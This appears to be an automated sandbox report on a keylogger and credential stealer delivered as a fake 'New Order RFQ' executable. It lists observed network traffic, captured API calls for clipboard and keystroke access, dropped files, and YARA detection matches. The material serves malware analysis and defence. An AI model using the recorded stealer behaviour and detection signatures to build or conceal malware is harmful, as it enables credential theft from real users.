              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007B4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_007B4164
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007B4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_007B4164
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FF4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00FF4164
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007B3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007B3F66
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007A001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_007A001C
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007CCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_007CCABC
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_0100CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0100CABC

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: Process Memory Space: alarmingness.exe PID: 7844, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: alarmingness.exe PID: 1204, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Binary is likely a compiled AutoIt script file
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: This is a third-party compiled AutoIt script.0_2_00743B3A
              Source: New Order RFQ- 19A20060.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: New Order RFQ- 19A20060.exe, 00000000.00000000.1178148602.00000000007F4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e32f0388-4
              Source: New Order RFQ- 19A20060.exe, 00000000.00000000.1178148602.00000000007F4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_7de0d48f-7
              Source: New Order RFQ- 19A20060.exe, 00000000.00000003.1188607399.0000000003CE3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c6a4ba46-9
              Source: New Order RFQ- 19A20060.exe, 00000000.00000003.1188607399.0000000003CE3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_b2523690-9
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: This is a third-party compiled AutoIt script.1_2_00F83B3A
              Source: alarmingness.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: alarmingness.exe, 00000001.00000000.1189092532.0000000001034000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ebdf4e66-c
              Source: alarmingness.exe, 00000001.00000000.1189092532.0000000001034000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_bee8c395-2
              Source: alarmingness.exe, 0000000A.00000002.1317901565.0000000001034000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_819e091d-1
              Source: alarmingness.exe, 0000000A.00000002.1317901565.0000000001034000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_c0b11ea3-2
              Source: New Order RFQ- 19A20060.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_aa8a9f59-d
              Source: New Order RFQ- 19A20060.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_c5337cb8-0
              Source: alarmingness.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d1a15d9d-5
              Source: alarmingness.exe.0.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_59a292fc-4
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: New Order RFQ- 19A20060.exe
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007AA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_007AA1EF
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00798310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00798310
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007A51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_007A51BD
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FE51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_00FE51BD
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0074E6A00_2_0074E6A0
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0076D9750_2_0076D975
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0074FCE00_2_0074FCE0
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007621C50_2_007621C5
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007762D20_2_007762D2
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007C03DA0_2_007C03DA
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0077242E0_2_0077242E
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007625FA0_2_007625FA
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0079E6160_2_0079E616
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007566E10_2_007566E1
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0077878F0_2_0077878F
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007C08570_2_007C0857
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007768440_2_00776844
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007588080_2_00758808
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007A88890_2_007A8889
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0076CB210_2_0076CB21
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00776DB60_2_00776DB6
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00756F9E0_2_00756F9E
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007530300_2_00753030
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0076F1D90_2_0076F1D9
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007631870_2_00763187
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007412870_2_00741287
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007614840_2_00761484
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007555200_2_00755520
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007676960_2_00767696
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007557600_2_00755760
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007619780_2_00761978
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007C7DDB0_2_007C7DDB
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0076BDA60_2_0076BDA6
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00761D900_2_00761D90
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0074DF000_2_0074DF00
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00753FE00_2_00753FE0
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_012522B80_2_012522B8
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F8E6A01_2_00F8E6A0
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FAD9751_2_00FAD975
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F8FCE01_2_00F8FCE0
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FA21C51_2_00FA21C5
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FB62D21_2_00FB62D2
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_010003DA1_2_010003DA
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FB242E1_2_00FB242E
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FA25FA1_2_00FA25FA
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F966E11_2_00F966E1
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FDE6161_2_00FDE616
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FB878F1_2_00FB878F
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FE88891_2_00FE8889
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FB68441_2_00FB6844
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F988081_2_00F98808
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_010008571_2_01000857
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FACB211_2_00FACB21
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FB6DB61_2_00FB6DB6
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F96F9E1_2_00F96F9E
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F930301_2_00F93030
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FAF1D91_2_00FAF1D9
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FA31871_2_00FA3187
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F812871_2_00F81287
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FA14841_2_00FA1484
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F955201_2_00F95520
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FA76961_2_00FA7696
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F957601_2_00F95760
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FA19781_2_00FA1978
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_01007DDB1_2_01007DDB
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FABDA61_2_00FABDA6
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FA1D901_2_00FA1D90
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F93FE01_2_00F93FE0
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F8DF001_2_00F8DF00
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_016026401_2_01602640
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DD2783_2_028DD278
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028D53703_2_028D5370
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DA0883_2_028DA088
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DC1463_2_028DC146
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DC7383_2_028DC738
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DC46A3_2_028DC46A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DCA083_2_028DCA08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DE9883_2_028DE988
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028D69A03_2_028D69A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028D3E093_2_028D3E09
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DCFAA3_2_028DCFAA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028D6FC83_2_028D6FC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DCCD83_2_028DCCD8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DF6313_2_028DF631
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DFA883_2_028DFA88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028D39ED3_2_028D39ED
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028D29EC3_2_028D29EC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DE97A3_2_028DE97A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06491E803_2_06491E80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064917A03_2_064917A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06499C183_2_06499C18
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064995483_2_06499548
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06490B303_2_06490B30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064950283_2_06495028
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064929683_2_06492968
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06491E703_2_06491E70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649DE003_2_0649DE00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649E6AF3_2_0649E6AF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649E6B03_2_0649E6B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649EF513_2_0649EF51
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649EF603_2_0649EF60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649178F3_2_0649178F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649FC683_2_0649FC68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649CC8F3_2_0649CC8F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649CCA03_2_0649CCA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649D5403_2_0649D540
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649D5503_2_0649D550
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649DDF13_2_0649DDF1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649E24A3_2_0649E24A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649E2583_2_0649E258
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649EB083_2_0649EB08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064993283_2_06499328
